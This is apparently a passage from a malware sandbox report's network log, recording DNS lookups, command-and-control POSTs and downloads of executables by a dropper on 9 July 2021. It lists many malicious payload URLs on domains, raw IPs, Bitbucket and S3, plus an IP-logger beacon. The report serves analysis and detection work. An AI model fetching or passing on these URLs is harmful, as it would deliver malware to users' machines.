                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 308
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:23 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 368
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:24 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 209
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:24 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 201
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:25 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 308
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:26 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 181
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:03:27 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          menzbv.pw
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          menzbv.pw
                                                                                          IN A
                                                                                          Response
                                                                                          menzbv.pw
                                                                                          IN A
                                                                                          111.90.146.149
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://menzbv.pw/adsli/md9_1sjm.exe
                                                                                          Remote address:
                                                                                          111.90.146.149:80
                                                                                          Request
                                                                                          GET /adsli/md9_1sjm.exe HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: menzbv.pw
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Content-Type: application/octet-stream
                                                                                          Last-Modified: Fri, 09 Jul 2021 09:13:37 GMT
                                                                                          Accept-Ranges: bytes
                                                                                          ETag: "7e4971b3a274d71:0"
                                                                                          Server: Microsoft-IIS/8.5
                                                                                          Date: Fri, 09 Jul 2021 23:04:04 GMT
                                                                                          Content-Length: 806400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          ezzouhour.s3.eu-west-1.amazonaws.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          ezzouhour.s3.eu-west-1.amazonaws.com
                                                                                          IN A
                                                                                          Response
                                                                                          ezzouhour.s3.eu-west-1.amazonaws.com
                                                                                          IN CNAME
                                                                                          s3-r-w.eu-west-1.amazonaws.com
                                                                                          s3-r-w.eu-west-1.amazonaws.com
                                                                                          IN A
                                                                                          52.218.106.72
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://ezzouhour.s3.eu-west-1.amazonaws.com/recMe/irec7.exe
                                                                                          Remote address:
                                                                                          52.218.106.72:443
                                                                                          Request
                                                                                          GET /recMe/irec7.exe HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: ezzouhour.s3.eu-west-1.amazonaws.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          x-amz-id-2: OzIY5xr77YCtz4cPnGJ8phvT7nOAHlA+6lmu2k3eys04flym4aeGcGggvRvo6hsJtGPwPmmhwhU=
                                                                                          x-amz-request-id: 9228EX0MDYNYPDTK
                                                                                          Date: Fri, 09 Jul 2021 23:04:07 GMT
                                                                                          Last-Modified: Fri, 09 Jul 2021 14:49:29 GMT
                                                                                          ETag: "912e3bdf2de1c6096b761220c3d4a34e"
                                                                                          Accept-Ranges: bytes
                                                                                          Content-Type: application/x-msdownload
                                                                                          Server: AmazonS3
                                                                                          Content-Length: 768387
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          g-partners.live
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          g-partners.live
                                                                                          IN A
                                                                                          Response
                                                                                          g-partners.live
                                                                                          IN A
                                                                                          176.113.115.136
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://g-partners.live/installer.php?pub=azed
                                                                                          Remote address:
                                                                                          176.113.115.136:80
                                                                                          Request
                                                                                          GET /installer.php?pub=azed HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: g-partners.live
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:06 GMT
                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                          X-Powered-By: PHP/5.4.16
                                                                                          Keep-Alive: timeout=5, max=100
                                                                                          Connection: Keep-Alive
                                                                                          Transfer-Encoding: chunked
                                                                                          Content-Type: text/html
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          loat.info
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          loat.info
                                                                                          IN A
                                                                                          Response
                                                                                          loat.info
                                                                                          IN A
                                                                                          172.67.208.9
                                                                                          loat.info
                                                                                          IN A
                                                                                          104.21.53.24
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://loat.info/5b4d832ed4ec58c8ef741d63495c42e5.exe
                                                                                          Remote address:
                                                                                          172.67.208.9:443
                                                                                          Request
                                                                                          GET /5b4d832ed4ec58c8ef741d63495c42e5.exe HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: loat.info
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:06 GMT
                                                                                          Content-Type: application/octet-stream
                                                                                          Content-Length: 4678696
                                                                                          Connection: keep-alive
                                                                                          Last-Modified: Fri, 09 Jul 2021 22:29:19 GMT
                                                                                          Cache-Control: max-age=1800
                                                                                          CF-Cache-Status: HIT
                                                                                          Age: 2087
                                                                                          Accept-Ranges: bytes
                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=lE6YmT3IkBdRduLRGyyEV9JEbWxuO78Abl59P0oNPVUqIP7ykWkfK%2F8%2BuUYCoDa6OjaXg8febW4LpSHixaE6a1iP9NAEE24rKpb%2BZjELLwpVYQaASZDn"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 66c530839ff500ac-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://101.36.107.74/seemorebty/il.php?e=FD49
                                                                                          FD49.exe
                                                                                          Remote address:
                                                                                          101.36.107.74:80
                                                                                          Request
                                                                                          GET /seemorebty/il.php?e=FD49 HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Referer: https://www.facebook.com
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
                                                                                          Host: 101.36.107.74
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:07 GMT
                                                                                          Server: Apache/2.4.37 (centos)
                                                                                          X-Powered-By: PHP/7.2.24
                                                                                          Content-Length: 0
                                                                                          Keep-Alive: timeout=5, max=100
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          requested404.com
                                                                                          1075474_ah_hot_iconçè_)))_.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          requested404.com
                                                                                          IN A
                                                                                          Response
                                                                                          requested404.com
                                                                                          IN A
                                                                                          63.250.33.126
                                                                                        • flag-unknown
                                                                                          HEAD
                                                                                          http://requested404.com/C_Pirlo/I-Record.exe
                                                                                          FEF0.tmp
                                                                                          Remote address:
                                                                                          63.250.33.126:80
                                                                                          Request
                                                                                          HEAD /C_Pirlo/I-Record.exe HTTP/1.1
                                                                                          Accept: */*
                                                                                          User-Agent: InnoDownloadPlugin/1.5
                                                                                          Host: requested404.com
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:08 GMT
                                                                                          Server: Apache
                                                                                          Last-Modified: Fri, 09 Jul 2021 15:05:46 GMT
                                                                                          ETag: "52e00-5c6b21b2eb43a"
                                                                                          Accept-Ranges: bytes
                                                                                          Content-Length: 339456
                                                                                          Keep-Alive: timeout=5, max=100
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/octet-stream
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://requested404.com/C_Pirlo/I-Record.exe
                                                                                          FEF0.tmp
                                                                                          Remote address:
                                                                                          63.250.33.126:80
                                                                                          Request
                                                                                          GET /C_Pirlo/I-Record.exe HTTP/1.1
                                                                                          Accept: */*
                                                                                          User-Agent: InnoDownloadPlugin/1.5
                                                                                          Host: requested404.com
                                                                                          Connection: Keep-Alive
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:08 GMT
                                                                                          Server: Apache
                                                                                          Last-Modified: Fri, 09 Jul 2021 15:05:46 GMT
                                                                                          ETag: "52e00-5c6b21b2eb43a"
                                                                                          Accept-Ranges: bytes
                                                                                          Content-Length: 339456
                                                                                          Keep-Alive: timeout=5, max=99
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/octet-stream
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://95.213.144.186:8080/3.php
                                                                                          Remote address:
                                                                                          95.213.144.186:8080
                                                                                          Request
                                                                                          GET /3.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: 95.213.144.186:8080
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:04:09 GMT
                                                                                          Server: Apache/2.4.37 (centos)
                                                                                          X-Powered-By: PHP/7.2.24
                                                                                          Content-Transfer-Encoding: Binary
                                                                                          Content-disposition: attachment; filename="tnjkhve4kq1pu.exe"
                                                                                          Keep-Alive: timeout=5, max=100
                                                                                          Connection: Keep-Alive
                                                                                          Transfer-Encoding: chunked
                                                                                          Content-Type: application/octet-stream
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.zzepms.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.zzepms.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.zzepms.com
                                                                                          IN A
                                                                                          103.155.92.96
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://www.zzepms.com/askhelp51/askinstall51.exe
                                                                                          Remote address:
                                                                                          103.155.92.96:80
                                                                                          Request
                                                                                          GET /askhelp51/askinstall51.exe HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: www.zzepms.com
                                                                                          Response
                                                                                          HTTP/1.1 302 Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:10 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Content-Length: 0
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                          Location: http://www.zzepms.com/askinstall51.exe
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://www.zzepms.com/askinstall51.exe
                                                                                          Remote address:
                                                                                          103.155.92.96:80
                                                                                          Request
                                                                                          GET /askinstall51.exe HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: www.zzepms.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:10 GMT
                                                                                          Content-Type: application/octet-stream
                                                                                          Content-Length: 1484288
                                                                                          Last-Modified: Tue, 06 Jul 2021 03:01:10 GMT
                                                                                          Connection: keep-alive
                                                                                          ETag: "60e3c776-16a600"
                                                                                          Accept-Ranges: bytes
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          bitbucket.org
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          bitbucket.org
                                                                                          IN A
                                                                                          Response
                                                                                          bitbucket.org
                                                                                          IN A
                                                                                          104.192.141.1
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://bitbucket.org/globallinstall/globalinstall/downloads/JointerPokerish_2021-07-07_19-21.exe
                                                                                          Remote address:
                                                                                          104.192.141.1:443
                                                                                          Request
                                                                                          GET /globallinstall/globalinstall/downloads/JointerPokerish_2021-07-07_19-21.exe HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: bitbucket.org
                                                                                          Response
                                                                                          HTTP/1.1 302 Found
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
                                                                                          Server: nginx
                                                                                          X-Usage-Quota-Remaining: 998976.884
                                                                                          Vary: Accept-Language, Origin
                                                                                          X-Usage-Request-Cost: 1040.07
                                                                                          Cache-Control: no-cache, no-store, must-revalidate, max-age=0
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          X-B3-TraceId: 23c77726cf5c1872
                                                                                          X-Usage-Output-Ops: 0
                                                                                          X-Dc-Location: Micros
                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                          Date: Fri, 09 Jul 2021 23:04:13 GMT
                                                                                          bbr1repopath: /data/c03/n03/p/vp1186/data/d-702/r-90510702
                                                                                          X-Usage-User-Time: 0.025168
                                                                                          X-Usage-System-Time: 0.006034
                                                                                          Location: https://bbuseruploads.s3.amazonaws.com/fcb752ab-3dce-4502-8a1b-14cba7bf8f58/downloads/d55fad87-82f4-4d5f-84e7-0702720ae82c/JointerPokerish_2021-07-07_19-21.exe?Signature=ScekDx3P3S1hUHtluyA3eCAciZM%3D&Expires=1625873509&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=I6n8o2QcK1qU_ovIhM6Me7Hh2rXSqv_z&response-content-disposition=attachment%3B%20filename%3D%22JointerPokerish_2021-07-07_19-21.exe%22
                                                                                          X-Served-By: 2e22f7057048
                                                                                          Expires: Fri, 09 Jul 2021 23:04:13 GMT
                                                                                          Content-Language: en
                                                                                          X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                          X-Static-Version: f512e77453d0
                                                                                          X-Render-Time: 0.0588738918304
                                                                                          Connection: keep-alive
                                                                                          X-Usage-Input-Ops: 0
                                                                                          X-Request-Count: 1253
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Version: f512e77453d0
                                                                                          X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
                                                                                          Content-Length: 0
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          bbuseruploads.s3.amazonaws.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          bbuseruploads.s3.amazonaws.com
                                                                                          IN A
                                                                                          Response
                                                                                          bbuseruploads.s3.amazonaws.com
                                                                                          IN CNAME
                                                                                          s3-1-w.amazonaws.com
                                                                                          s3-1-w.amazonaws.com
                                                                                          IN CNAME
                                                                                          s3-w.us-east-1.amazonaws.com
                                                                                          s3-w.us-east-1.amazonaws.com
                                                                                          IN A
                                                                                          52.216.138.243
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.listincode.com
                                                                                          15D6.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.listincode.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.listincode.com
                                                                                          IN A
                                                                                          144.202.76.47
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.listincode.com/
                                                                                          15D6.exe
                                                                                          Remote address:
                                                                                          144.202.76.47:443
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
                                                                                          Host: www.listincode.com
                                                                                          Cache-Control: no-cache
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:17 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 2
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.4.45
                                                                                          Access-Control-Allow-Origin: *
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://bbuseruploads.s3.amazonaws.com/fcb752ab-3dce-4502-8a1b-14cba7bf8f58/downloads/d55fad87-82f4-4d5f-84e7-0702720ae82c/JointerPokerish_2021-07-07_19-21.exe?Signature=ScekDx3P3S1hUHtluyA3eCAciZM%3D&Expires=1625873509&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=I6n8o2QcK1qU_ovIhM6Me7Hh2rXSqv_z&response-content-disposition=attachment%3B%20filename%3D%22JointerPokerish_2021-07-07_19-21.exe%22
                                                                                          Remote address:
                                                                                          52.216.138.243:443
                                                                                          Request
                                                                                          GET /fcb752ab-3dce-4502-8a1b-14cba7bf8f58/downloads/d55fad87-82f4-4d5f-84e7-0702720ae82c/JointerPokerish_2021-07-07_19-21.exe?Signature=ScekDx3P3S1hUHtluyA3eCAciZM%3D&Expires=1625873509&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=I6n8o2QcK1qU_ovIhM6Me7Hh2rXSqv_z&response-content-disposition=attachment%3B%20filename%3D%22JointerPokerish_2021-07-07_19-21.exe%22 HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: bbuseruploads.s3.amazonaws.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          x-amz-id-2: uCGl9BaST5TvIR54pJVgx59iZwOFRhz7CtjdkOC3FEj8OQ9iBAv1Sa0R0+1JK/riu8DAVWqIxUk=
                                                                                          x-amz-request-id: 9C2KGWSRQGDHD6RD
                                                                                          Date: Fri, 09 Jul 2021 23:04:14 GMT
                                                                                          Last-Modified: Fri, 09 Jul 2021 23:01:44 GMT
                                                                                          ETag: "84594c9b7bbd67dd00d62c1dce396b3e"
                                                                                          x-amz-version-id: I6n8o2QcK1qU_ovIhM6Me7Hh2rXSqv_z
                                                                                          Content-Disposition: attachment; filename="JointerPokerish_2021-07-07_19-21.exe"
                                                                                          Accept-Ranges: bytes
                                                                                          Content-Type: application/x-msdownload
                                                                                          Server: AmazonS3
                                                                                          Content-Length: 360960
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://93.157.63.171/filename.exe
                                                                                          Remote address:
                                                                                          93.157.63.171:80
                                                                                          Request
                                                                                          GET /filename.exe HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: 93.157.63.171
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:15 GMT
                                                                                          Content-Type: application/octet-stream
                                                                                          Content-Length: 551424
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=60
                                                                                          Last-Modified: Fri, 09 Jul 2021 23:00:01 GMT
                                                                                          ETag: "86a00-5c6b8bb4405b5"
                                                                                          Accept-Ranges: bytes
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          connectini.net
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          connectini.net
                                                                                          IN A
                                                                                          Response
                                                                                          connectini.net
                                                                                          IN A
                                                                                          162.0.210.44
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          https://connectini.net/Series/SuperNitou.php
                                                                                          1075474_ah_hot_iconçè_)))_.exe
                                                                                          Remote address:
                                                                                          162.0.210.44:443
                                                                                          Request
                                                                                          POST /Series/SuperNitou.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Host: connectini.net
                                                                                          Content-Length: 51
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:04:19 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/7.1.33
                                                                                          X-Powered-By: PleskLin
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          statuse.digitalcertvalidation.com
                                                                                          15D6.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          statuse.digitalcertvalidation.com
                                                                                          IN A
                                                                                          Response
                                                                                          statuse.digitalcertvalidation.com
                                                                                          IN CNAME
                                                                                          ocsp.digicert.com
                                                                                          ocsp.digicert.com
                                                                                          IN CNAME
                                                                                          cs9.wac.phicdn.net
                                                                                          cs9.wac.phicdn.net
                                                                                          IN A
                                                                                          72.21.91.29
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://statuse.digitalcertvalidation.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRJrF0xYA49jC3D83fgDGesaUkzIQQUf9OZ86BHDjEAVlYijrfMnt3KAYoCEAYJR5FkG19ljPHMaGsuvmc%3D
                                                                                          15D6.exe
                                                                                          Remote address:
                                                                                          72.21.91.29:80
                                                                                          Request
                                                                                          GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRJrF0xYA49jC3D83fgDGesaUkzIQQUf9OZ86BHDjEAVlYijrfMnt3KAYoCEAYJR5FkG19ljPHMaGsuvmc%3D HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: */*
                                                                                          User-Agent: Microsoft-CryptoAPI/10.0
                                                                                          Host: statuse.digitalcertvalidation.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Accept-Ranges: bytes
                                                                                          Age: 4389
                                                                                          Cache-Control: max-age=144574
                                                                                          Content-Type: application/ocsp-response
                                                                                          Date: Fri, 09 Jul 2021 23:04:16 GMT
                                                                                          Etag: "60e85689-1d7"
                                                                                          Expires: Sun, 11 Jul 2021 15:13:50 GMT
                                                                                          Last-Modified: Fri, 09 Jul 2021 14:00:41 GMT
                                                                                          Server: ECS (bsa/EB1C)
                                                                                          X-Cache: HIT
                                                                                          Content-Length: 471
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          iplogger.org
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          iplogger.org
                                                                                          IN A
                                                                                          Response
                                                                                          iplogger.org
                                                                                          IN A
                                                                                          88.99.66.31
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://iplogger.org/1Cr3a7
                                                                                          15D6.exe
                                                                                          Remote address:
                                                                                          88.99.66.31:443
                                                                                          Request
                                                                                          GET /1Cr3a7 HTTP/1.1
